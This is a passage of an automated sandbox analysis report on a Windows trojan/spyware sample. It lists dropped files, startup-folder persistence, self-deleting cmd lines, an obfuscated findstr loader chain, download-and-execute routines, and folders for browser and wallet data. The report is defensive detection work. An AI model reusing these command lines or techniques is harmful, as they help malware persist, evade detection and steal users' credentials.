Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E9BE8		13_2_004E9BE8
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E9FB0		13_2_004E9FB0

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: lv[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lv[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lv[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: File.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wheezy.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wheezy.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: 7yyqdBJVGf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		10_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		13_2_004E1B23
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E1FEA ExitWindowsEx,		13_2_004E1FEA

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: String function: 00417470 appears 50 times
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: String function: 0040FAF0 appears 56 times

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Source: lv[1].exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.00268554688
Source: File.exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.00268554688
Source: parted.exe.10.dr	Static PE information: Section: ZLIB complexity 0.998956853693
Source: parted.exe.10.dr	Static PE information: Section: ZLIB complexity 0.989397321429
Source: IntelRapid.exe.15.dr	Static PE information: Section: ZLIB complexity 0.998956853693
Source: IntelRapid.exe.15.dr	Static PE information: Section: ZLIB complexity 0.989397321429

PE file has an executable .text section and no other executable section

Source: 7yyqdBJVGf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Creates files inside the user directory

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

File created: C:\Users\user\AppData\Roaming\aumaga

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@34/34@6/7

Reads ini files

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Contains functionality for error logging

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Code function: 13_2_004E40C8 GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,

13_2_004E40C8

Contains functionality to load and extract PE file embedded resources

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Code function: 13_2_004E54CE GetDlgItem,GetDlgItem,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

13_2_004E54CE

Executes visual basic scripts

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'

Creates files inside the program directory

Source: C:\Users\user\AppData\Local\Temp\File.exe

File created: C:\Program Files (x86)\foler

Jump to behavior

Sample is known by Antivirus

Source: 7yyqdBJVGf.exe	Virustotal: Detection: 52%
Source: 7yyqdBJVGf.exe	ReversingLabs: Detection: 48%

Reads software policies

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\7yyqdBJVGf.exe 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Contains functionality to adjust token privileges (e.g. debug / backup)

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Code function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

13_2_004E1B23

Creates temporary files

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

File created: C:\Users\user~1\AppData\Local\Temp\kCFlwhS

Jump to behavior

Contains functionality to instantiate COM classes

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_004024FB CoCreateInstance,

10_2_004024FB

Contains functionality to check free disk space

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

10_2_004044D1

Runs a DLL by calling functions

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Mutant created: \Sessions\1\BaseNamedObjects\{37529D08-A67E-40B3-B0F2-EB87331B47F5}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01

Might use command line arguments

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files\_Files		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files\_Wallet		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files\_Chrome		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files\_Opera		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \_Files\_Brave		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \files_		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \files_\files		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \files_\_Chrome		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \files_\_Opera		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: \files_\_Brave		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: %Temp%\		0_2_004163F0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Command line argument: >6C		0_2_00433590

Reads the hosts file

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses new MSVCR Dlls

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7yyqdBJVGf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

PE file contains a debug data directory

Source: 7yyqdBJVGf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
Source:	Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
Source:	Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
Source:	Binary string: acppage.pdb source: acppage.dll.10.dr

PE file contains a valid data directory to section mapping

Source: 7yyqdBJVGf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7yyqdBJVGf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7yyqdBJVGf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7yyqdBJVGf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7yyqdBJVGf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack

Obfuscated command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004174B6 push ecx; ret		0_2_004174C9
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0043768D push esi; ret		0_2_00437696
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E7049 push ecx; ret		13_2_004E705C

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

10_2_00406328

PE file contains sections with non-standard names

Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name:
Source: parted.exe.10.dr	Static PE information: section name: .themida
Source: parted.exe.10.dr	Static PE information: section name: .boot
Source: acppage.dll.10.dr	Static PE information: section name: .orpc
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name:
Source: IntelRapid.exe.15.dr	Static PE information: section name: .themida
Source: IntelRapid.exe.15.dr	Static PE information: section name: .boot

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

PE file contains an invalid checksum

Source: wheezy.exe.10.dr	Static PE information: real checksum: 0xe94bb should be: 0xe5407
Source: lv[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x450fee
Source: UAC.dll.10.dr	Static PE information: real checksum: 0x0 should be: 0xde12
Source: File.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x450fee

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: entropy: 7.97590031918
Source: initial sample	Static PE information: section name: entropy: 7.97590031918

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Program Files (x86)\foler\olader\acppage.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe			Jump to dropped file
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File created: C:\Users\user\AppData\Local\Temp\File.exe			Jump to dropped file
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Program Files (x86)\foler\olader\adprovider.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe	File created: C:\Program Files (x86)\foler\olader\acledit.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	File created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe			Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040E340

Contains functionality to read ini properties file for application configuration

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Code function: 13_2_004E2A51 CompareStringA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,LocalAlloc,GetFileAttributesA,

13_2_004E2A51

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk

Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'			Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
